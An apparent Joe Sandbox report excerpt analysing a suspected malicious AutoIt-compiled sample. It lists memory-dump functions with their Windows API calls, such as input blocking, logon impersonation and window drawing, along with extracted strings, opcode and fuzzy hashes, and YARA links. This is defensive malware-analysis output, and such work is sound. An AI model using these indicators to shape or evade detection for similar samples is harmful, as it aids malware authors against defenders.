Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: da48e6f20da02e2bc989c7094095a1612a0825d193b03f803ba0803f01ec69bc
Instruction ID: bb6c52abfccb73c051c92f90c0420583508bad1414638b2b74b36ec8c85e9e4c
Opcode Fuzzy Hash: da48e6f20da02e2bc989c7094095a1612a0825d193b03f803ba0803f01ec69bc
Instruction Fuzzy Hash: F2E04F312902149FCB10EF59D844B9AF7ECAF94760F04C426FD49CB352DA74EC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009C4EEC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 5b19a5a2f690d5578a4568b23cb2b3d6c1be92df316d9219bcc33e381e538e2a
Instruction ID: cc1cbcc7a77442d21b3a78d7b6e2d1a9fc7ea1e3390babeafcc7cbc6ac630487
Opcode Fuzzy Hash: 5b19a5a2f690d5578a4568b23cb2b3d6c1be92df316d9219bcc33e381e538e2a
Instruction Fuzzy Hash: 97D05E98B6060439FE184B209C7FF77010CF3007C1FD2455EB1028B0C2D8D46C506033

Uniqueness

Uniqueness Score: -1.00%

Function 009B8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009B88D1), ref: 009B8CB3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: fb761865c63eb4cd9929f60b77a9fd73f89dea5a171697e43538f8f1b80b63bb
Instruction ID: 99532635f30f66b7f70e186f5228f6bb9e0f91bbfdd4c2a6d441914d6dcd0281
Opcode Fuzzy Hash: fb761865c63eb4cd9929f60b77a9fd73f89dea5a171697e43538f8f1b80b63bb
Instruction Fuzzy Hash: F9D05E3226450EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Uniqueness

Uniqueness Score: -1.00%

Function 009A2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 009A2242

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 6c22ae550432b20701625cd2f2a2684a533047a445a1352483c0ca8a135b96fd
Instruction ID: 0a0b3dce06b0c3086f0478c860c52c4bb8837b0db1d9b81df5291ddb62693fbd
Opcode Fuzzy Hash: 6c22ae550432b20701625cd2f2a2684a533047a445a1352483c0ca8a135b96fd
Instruction Fuzzy Hash: 87C048F1814109DBDB05EBA0DA98DEEB7BCAB08305F2044A6A102F2140E7789B449AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0098A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0098A36A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 03a75d729792e32bee31cfa5527d2266c1aa359e4542042e4313e409861cb6b5
Instruction ID: c8dd1e3677460e740a3d9b70be39f0783b1f066ef2bea4c5bbbfc2e740a5aa7c
Opcode Fuzzy Hash: 03a75d729792e32bee31cfa5527d2266c1aa359e4542042e4313e409861cb6b5
Instruction Fuzzy Hash: 9FA0123001410CA78A001B41EC044447F5CD6002D07004021F40C44021873258105580

Uniqueness

Uniqueness Score: -1.00%

Function 00978A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b09bf35f41a5dcb301512b5d756b97f1406fa7718dd955f11db0a01e7cbb3b
Instruction ID: 5bbeed0e954528486a5d18bca1414b6eb6c217a50236b42fdf55a71e78276580
Opcode Fuzzy Hash: 80b09bf35f41a5dcb301512b5d756b97f1406fa7718dd955f11db0a01e7cbb3b
Instruction Fuzzy Hash: 77223B72A41616CBDF298B14C6DC7BF77A5FB41310F2DC86AD48A8B291DB349D81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00982405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 741df3946f75c6a245bd4b63f094d402c3313169491ff5322f93b89dd5476ff6
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: DFC184322051A30ADF2D573AD43413EBAE99AA27B131A075EE4B3CB6D4FF24D525D720

Uniqueness

Uniqueness Score: -1.00%

Function 0098283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 071086aea43f6e438f835e5e3cc733f4588edb5c7410314d9001744a33252585
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: BFC193322051A309DF6D573A943403EBBE99FA27B131A0B6DE4B2DB6C4EF24D525D720

Uniqueness

Uniqueness Score: -1.00%

Function 00981BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ef73d564a81ff6fda56193730d200e9693a207754c810b601905e51b3f491109
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 8CC1C5322051A309DF2D5639D43413EBBED9AA27B131A0B6DE4B3CB6C5EF24D526D710

Uniqueness

Uniqueness Score: -1.00%

Function 03E93660 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: bd8ffee2ded658a4657026e188f033642c54bfce03efeb7786bc960d5f6705d7
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8941C271D1091CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 03E934F0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 9d708071d7c9240dba16a970c471fc1b18efedc43e9d8439f98e495e440a74d1
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E9019279A00209EFDF49DF98C5909AEF7B5FB48310F24869AD819A7701D731EE41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 03E93550 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 7ac8f7dfb9270b336df824ef2bce979eb6f66d93a012d047650abd9c1194466d
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 22019278A00209EFDB44DF98C5909AEFBF5FB4C310F64869AD819A7701D730AE41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 03E91ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Uniqueness

Uniqueness Score: -1.00%

Function 009D7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009D7B70
DeleteObject.GDI32(00000000), ref: 009D7B82
DestroyWindow.USER32 ref: 009D7B90
GetDesktopWindow.USER32 ref: 009D7BAA
GetWindowRect.USER32(00000000), ref: 009D7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009D7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009D7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7D4A
GetClientRect.USER32(00000000,?), ref: 009D7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009D7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7DF8
GlobalFree.KERNEL32(00000000), ref: 009D7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009F2CAC,00000000), ref: 009D7E2B
GlobalFree.KERNEL32(00000000), ref: 009D7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009D7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009D7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009D808F

Strings

DISPLAY, xrefs: 009D7EF2
, xrefs: 009D8015
static, xrefs: 009D7D8A, 009D7EE1
AutoIt v3, xrefs: 009D7D42

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b5427e639c28c2062edb0c58da914f42ebd5ac216d6467c030ffdd5f6c609da2
Instruction ID: 3e402b5aed375a79923d7cd434b2b39bf2c577a98d919889a59dbe503f37d03f
Opcode Fuzzy Hash: b5427e639c28c2062edb0c58da914f42ebd5ac216d6467c030ffdd5f6c609da2
Instruction Fuzzy Hash: 2F028E71910109EFDF14DFA8CC99EAEBBB9EB48310F14855AF905AB3A1DB349D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,009EF910), ref: 009E38AF
IsWindowVisible.USER32(?), ref: 009E38D3

Strings

FINDSTRING, xrefs: 009E39FE
SELECTSTRING, xrefs: 009E3A8E
GETCURRENTSELECTION, xrefs: 009E3A6B
ADDSTRING, xrefs: 009E399E
TABLEFT, xrefs: 009E390F
CHECK, xrefs: 009E3AF5
GETLINE, xrefs: 009E3C23
GETCURRENTLINE, xrefs: 009E3B75
HIDEDROPDOWN, xrefs: 009E3988
EDITPASTE, xrefs: 009E3BE7
CURRENTTAB, xrefs: 009E3945
DELSTRING, xrefs: 009E39D1
UNCHECK, xrefs: 009E3B0B
SHOWDROPDOWN, xrefs: 009E3968
GETLINECOUNT, xrefs: 009E3B4E
GETSELECTED, xrefs: 009E3B2B
SENDCOMMANDID, xrefs: 009E3C62
TABRIGHT, xrefs: 009E3925
GETCURRENTCOL, xrefs: 009E3BB0
ISVISIBLE, xrefs: 009E38BF
ISENABLED, xrefs: 009E38F3
SETCURRENTSELECTION, xrefs: 009E3A3E
ISCHECKED, xrefs: 009E3AC1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 926c6fba1b099142374bdf0ed9ed89c6dcda8aa75cc1f7349f9495085b73fadf
Instruction ID: 406e4146b1775062e2ad29ee3b5b579305b1e3945abf958de88314983e519749
Opcode Fuzzy Hash: 926c6fba1b099142374bdf0ed9ed89c6dcda8aa75cc1f7349f9495085b73fadf
Instruction Fuzzy Hash: 44D1CF30214345DBCB11EF21C555BAAB7AAAFD8354F148858B8865B3E3CB34EE4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 009EA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 009EA89F
GetSysColorBrush.USER32(0000000F), ref: 009EA8D0
GetSysColor.USER32(0000000F), ref: 009EA8DC
SetBkColor.GDI32(?,000000FF), ref: 009EA8F6
SelectObject.GDI32(?,?), ref: 009EA905
InflateRect.USER32(?,000000FF,000000FF), ref: 009EA930
GetSysColor.USER32(00000010), ref: 009EA938
CreateSolidBrush.GDI32(00000000), ref: 009EA93F
FrameRect.USER32(?,?,00000000), ref: 009EA94E
DeleteObject.GDI32(00000000), ref: 009EA955
InflateRect.USER32(?,000000FE,000000FE), ref: 009EA9A0
FillRect.USER32(?,?,?), ref: 009EA9D2
GetWindowLongW.USER32(?,000000F0), ref: 009EA9FD

Part of subcall function 009EAB60: GetSysColor.USER32(00000012), ref: 009EAB99
Part of subcall function 009EAB60: SetTextColor.GDI32(?,?), ref: 009EAB9D
Part of subcall function 009EAB60: GetSysColorBrush.USER32(0000000F), ref: 009EABB3
Part of subcall function 009EAB60: GetSysColor.USER32(0000000F), ref: 009EABBE
Part of subcall function 009EAB60: GetSysColor.USER32(00000011), ref: 009EABDB
Part of subcall function 009EAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009EABE9
Part of subcall function 009EAB60: SelectObject.GDI32(?,00000000), ref: 009EABFA
Part of subcall function 009EAB60: SetBkColor.GDI32(?,00000000), ref: 009EAC03
Part of subcall function 009EAB60: SelectObject.GDI32(?,?), ref: 009EAC10
Part of subcall function 009EAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 009EAC2F
Part of subcall function 009EAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009EAC46
Part of subcall function 009EAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 009EAC5B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: af8c45ed4b1c2e518059f720457daacfcbcfe21cd6d5798a6fc50e9176985db7
Instruction ID: f82a0d27882ea1e48ffc02ab42e42f65b161fd4d8e51f7e2d9d7ed4a914e463d
Opcode Fuzzy Hash: af8c45ed4b1c2e518059f720457daacfcbcfe21cd6d5798a6fc50e9176985db7
Instruction Fuzzy Hash: BDA1C271008381EFDB119F64DC48A6B7BA9FF88321F104A2AF9629A1E1C734ED44DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009D77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009D77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009D78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009D78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009D7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009D7946
GetClientRect.USER32(00000000,?), ref: 009D7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009D7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009D79A5
GetStockObject.GDI32(00000011), ref: 009D79B5
SelectObject.GDI32(00000000,00000000), ref: 009D79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009D79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009D79D2
DeleteDC.GDI32(00000000), ref: 009D79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009D7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 009D7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009D7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009D7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 009D7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009D7AAE
GetStockObject.GDI32(00000011), ref: 009D7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009D7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009D7ACE

Strings

DISPLAY, xrefs: 009D799B
msctls_progress32, xrefs: 009D7A4F
static, xrefs: 009D7990, 009D7AA8
AutoIt v3, xrefs: 009D793E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8eabba11afc61a4a48e692f6acd68efcf553e117e43e4b613c662510afb9e04a
Instruction ID: aadc7978e990ff042bb0ae2371d4c892559da51c26d04214bfb909b9a6a0e457
Opcode Fuzzy Hash: 8eabba11afc61a4a48e692f6acd68efcf553e117e43e4b613c662510afb9e04a
